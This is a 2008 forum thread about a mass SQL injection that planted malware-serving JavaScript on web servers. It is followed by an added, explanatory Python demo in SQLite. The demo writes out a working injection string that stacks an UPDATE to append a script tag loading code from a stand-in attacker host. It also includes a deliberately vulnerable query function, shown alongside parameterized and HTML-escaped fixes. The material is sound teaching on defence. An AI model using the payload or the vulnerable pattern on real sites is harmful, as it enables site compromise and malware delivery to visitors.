Linked by Thom Holwerda on Mon 28th Apr 2008 19:22 UTC, submitted by Hakime
Legal Last week, The Washington Post reported that hundreds of thousands of IIS webservers were hacked. Code was placed on them that installed malware on visitors' computers. Among the infectees were websites from the UK government and the United Nations. Initial reports said the attackers used a security vulnerability in Microsoft's IIS, but the company published more information on the attacks today, and denies IIS was compromised.
Thread beginning with comment 311786
Dumb Question....
by JPowers on Mon 28th Apr 2008 23:23 UTC

If the issue is that someone attacked the server and injected code into the MS-SQL server, then how are the client systems being infected?

The best I can see is that they injected code to turn on a back door so they could modify the web-server.

Thus the security issue is also on the client PCs. They are allowing a web site to install anything the server wants on their PC. SQL injection shouldn't work on the client since the DB is located on the server.

What types of clients are being infected? And since MS verified that it was a server issue, what is MS's advice on how to protect the client from the servers?

Reply Score: 1

RE: Dumb Question....
by emission on Tue 29th Apr 2008 00:13 in reply to "Dumb Question...."

The client injection is caused by javascript code that's injected into the database. In other words...

1. SQL injection puts JavaScript into the database
2. Injected database content is shown on the page
3. Javascript opens windows with malware

So, the client injection part of this could have been stopped if the web sites used proper HTML encoding of the database output.

Reply Parent Score: 2
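The three steps in the reply above, as an added example that is not part of the original thread or of Microsoft's write-up. It stands in SQLite (Python's built-in sqlite3 module) for MS-SQL, uses an invented `news` table, and a constructed injection payload that appends a script tag pointing at the reserved name attacker.invalid; none of these are from the actual attack. The vulnerable lookup concatenates the request parameter into SQL and runs it through a call that accepts stacked statements, which is what lets a harmless-looking `id` parameter carry an `UPDATE` that rewrites every row. Rendering is shown twice: raw, and with the HTML encoding the reply recommends. A parameterized lookup is included as the server-side fix.

```python
import html
import sqlite3

# Constructed payload for illustration only: a script tag that, once stored and
# rendered, would make every visitor's browser fetch a third-party script.
INJECTED_SCRIPT = '<script src="http://attacker.invalid/m.js"></script>'

# Constructed malicious value for the "id" request parameter. The first statement is the
# one the page expects; the second is stacked on after it (SQLite concatenates with ||).
ATTACK_PARAM = "1; UPDATE news SET body = body || '" + INJECTED_SCRIPT + "'"


def setup_db():
    """Fresh in-memory database with two ordinary rows (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO news (id, title, body) VALUES (?, ?, ?)",
        [(1, "Hello", "First post"), (2, "Update", "Second post")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, news_id):
    """Step 1 (vulnerable): untrusted input glued into SQL and executed by a call
    that runs multiple statements, so an attacker can append an UPDATE."""
    conn.executescript("SELECT title, body FROM news WHERE id = " + news_id)


def lookup_fixed(conn, news_id):
    """Server-side fix: the parameter is bound as a value, never parsed as SQL."""
    return conn.execute(
        "SELECT title, body FROM news WHERE id = ?", (news_id,)
    ).fetchall()


def fetch_all(conn):
    return conn.execute("SELECT title, body FROM news ORDER BY id").fetchall()


def render_unsafe(rows):
    """Step 2 (vulnerable): database content dropped straight into the page."""
    return "".join(f"<h2>{title}</h2><p>{body}</p>" for title, body in rows)


def render_safe(rows):
    """Step 2 (fixed): output is HTML-encoded, so '<' becomes '&lt;' and the stored
    script tag is shown as text instead of being executed by the browser."""
    return "".join(
        f"<h2>{html.escape(title)}</h2><p>{html.escape(body)}</p>"
        for title, body in rows
    )


def demo_attack():
    """Run the injection against the vulnerable lookup, then render both ways."""
    conn = setup_db()
    lookup_vulnerable(conn, ATTACK_PARAM)          # step 1: script stored in every row
    rows = fetch_all(conn)
    unsafe_html = render_unsafe(rows)              # step 2/3: tag reaches the browser
    safe_html = render_safe(rows)                  # encoding neutralises it
    return {
        "stored": any(INJECTED_SCRIPT in body for _, body in rows),
        "unsafe_has_script_tag": "<script" in unsafe_html,
        "safe_has_script_tag": "<script" in safe_html,
    }


def demo_parameterized():
    """Same payload against the parameterized lookup: nothing matches, nothing changes."""
    conn = setup_db()
    rows = lookup_fixed(conn, ATTACK_PARAM)
    return {
        "rows": rows,
        "stored": any(INJECTED_SCRIPT in body for _, body in fetch_all(conn)),
    }


if __name__ == "__main__":
    print(demo_attack())
    print(demo_parameterized())
```

Both fixes are needed, not one or the other: parameterized queries stop this particular way of getting the script into the database, while output encoding stops any script that reaches the database by some other route (an admin form, a bulk import) from ever running in a visitor's browser. `html.escape` defaults to `quote=True`, which also covers values placed inside attributes.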